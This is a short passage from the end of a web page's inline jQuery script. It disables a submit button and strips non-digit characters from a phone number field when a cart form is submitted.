				$('.js-submit-button').addClass('disable');
			}
		});

		$('.cart-form').submit(function () {
			var inputField = $('#phoneInput');

			var inputValue = inputField.val().replace(/[^0-9]/g, '');
			inputField.val(inputValue);

		});


	</script>

</body>

</html>